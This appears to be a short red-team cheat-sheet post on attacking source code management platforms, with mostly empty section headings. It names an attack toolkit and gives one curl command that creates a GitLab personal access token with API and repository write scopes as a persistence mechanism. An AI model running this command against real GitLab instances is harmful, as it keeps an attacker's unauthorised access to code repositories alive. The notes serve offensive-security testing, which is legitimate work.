layout: post
title: “Source Code Management”
date: 2022-11-03 19:21:42
description: Knowledge and tips on source code management.
toc: true
tags:

Source Code Management

Enumeration

Using SCMKit - Source Code Management Attack Toolkit

Personal Access Token

Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.

curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"

Exploit Gitlab CI/Github Actions

References